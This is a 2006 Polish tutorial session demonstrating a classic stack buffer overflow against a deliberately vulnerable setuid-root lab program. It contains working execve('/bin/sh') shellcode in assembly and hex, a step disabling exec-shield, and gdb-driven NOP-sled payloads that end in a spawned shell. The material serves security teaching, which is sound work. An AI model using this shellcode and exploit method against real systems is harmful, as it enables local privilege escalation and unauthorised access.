Buffer Overflow
-- Sebastian Pawlak, 2006.
Sesja pokazująca wykorzystanie błędu typu buffer overflow na stosie do uruchomienia własnego shellcode'u.
Kod źródłowy pliku "sesja2":
[hacka@Jupiter vuln]$ ls
shell.asm vuln.c
[hacka@Jupiter vuln]$ cat shell.asm
BITS 32
jmp short data
start: pop esi
xor eax, eax
mov byte [esi + 7], al
mov long [esi + 8], esi
mov long [esi + 12], eax
mov byte al, 0x0b
mov ebx, esi
lea ecx, [esi + 8]
lea edx, [esi + 12]
int 0x80
xor ebx, ebx
mov eax, ebx
inc eax
int 0x80
data: call start
db '/bin/sh'
[hacka@Jupiter vuln]$ nasm -o shell.bin shell.asm
[hacka@Jupiter vuln]$ ls -l
total 12
-rw-r--r-- 1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r-- 1 hacka hacka 45 Mar 31 22:28 shell.bin
-rw-r--r-- 1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ od -tx1 shell.bin
0000000 eb 1f 5e 31 c0 88 46 07 89 76 08 89 46 0c b0 0b
0000020 89 f3 8d 4e 08 8d 56 0c cd 80 31 db 89 d8 40 cd
0000040 80 e8 dc ff ff ff 2f 62 69 6e 2f 73 68
0000055
[hacka@Jupiter vuln]$ od -tc shell.bin
0000000 353 037 ^ 1 300 210 F \a 211 v \b 211 F \f 260 \v
0000020 211 363 215 N \b 215 V \f 315 200 1 333 211 330 @ 315
0000040 200 350 334 377 377 377 / b i n / s h
0000055
[hacka@Jupiter vuln]$ gcc -g -o vuln vuln.c
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# chown root.root vuln
[root@Jupiter vuln]# chmod u+s vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ ls -l
total 24
-rw-r--r-- 1 hacka hacka 400 Mar 31 22:24 shell.asm
-rw-rw-r-- 1 hacka hacka 45 Mar 31 22:28 shell.bin
-rwsrwxr-x 1 root root 10651 Mar 31 22:31 vuln
-rw-r--r-- 1 hacka hacka 190 Mar 31 22:24 vuln.c
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
[hacka@Jupiter vuln]$ ./vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault
[hacka@Jupiter vuln]$ su root
Password:
[root@Jupiter vuln]# cat ../\!/unprotect.sh
#!/bin/bash
/sbin/sysctl -w kernel.exec-shield=0
/sbin/sysctl -w kernel.randomize_va_space=0
[root@Jupiter vuln]# cd ../\!/
[root@Jupiter !]# ./unprotect.sh
kernel.exec-shield = 0
error: 'kernel.randomize_va_space' is an unknown key
[root@Jupiter !]# cd ../vuln
[root@Jupiter vuln]# exit
[hacka@Jupiter vuln]$ gdb ./vuln
GNU gdb Red Hat Linux (6.0post-0.20040223.19rh)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...Using host libthread_db lib
rary "/lib/tls/libthread_db.so.1".
(gdb) set args aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
(gdb) r
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) b func
Breakpoint 1 at 0x8048379: file vuln.c, line 7.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaa
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff966 'a' <repeats 200 times>gt;...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\x99\
x99\x99\x99"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\x99\x99\x99\x99"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>gt;...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) info reg
eax 0x0 0
ecx 0xfffffcf5 -779
edx 0xfefffa93 -16778605
ebx 0x61dffc 6414332
esp 0xfefff708 0xfefff708
ebp 0x90909090 0x90909090
esi 0x2 2
edi 0x6200fc 6422780
eip 0x90909090 0x90909090
eflags 0x210286 2163334
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) x/s 0xfefff708
0xfefff708: '\220' <repeats 75 times>gt;, " \037^1 \210F\a\211v\b\211F\f \v\21
1 \215N\n\215V\f \2001 \211 @ \200 /bin/sh\231\231\231\231\231\231\231\231"
(gdb) x/s 0xfefff708-100
0xfefff6a4: '\220' <repeats 175 times>gt;, " \037^1 \210F\a\211v\b\211F\f \b\2
11 \215N\b\215V\f "...
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x2'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x2'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff98a '\220' <repeats 200 times>gt;...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) set args `perl -e 'print "\x90"x211'; cat shell.bin; perl -e 'print "\xa4\
xf6\xff\xfe"x4'`
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/hacka/vuln/vuln `perl -e 'print "\x90"x211'; cat shell.b
in; perl -e 'print "\xa4\xf6\xff\xfe"x4'`
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Error while reading shared library symbols:
: Permission denied.
Breakpoint 1, func (p=0xfefff982 '\220' <repeats 200 times>gt;...) at vuln.c:7
7 strcpy(buf, p);
(gdb) cont
Continuing.
sh-2.05b$
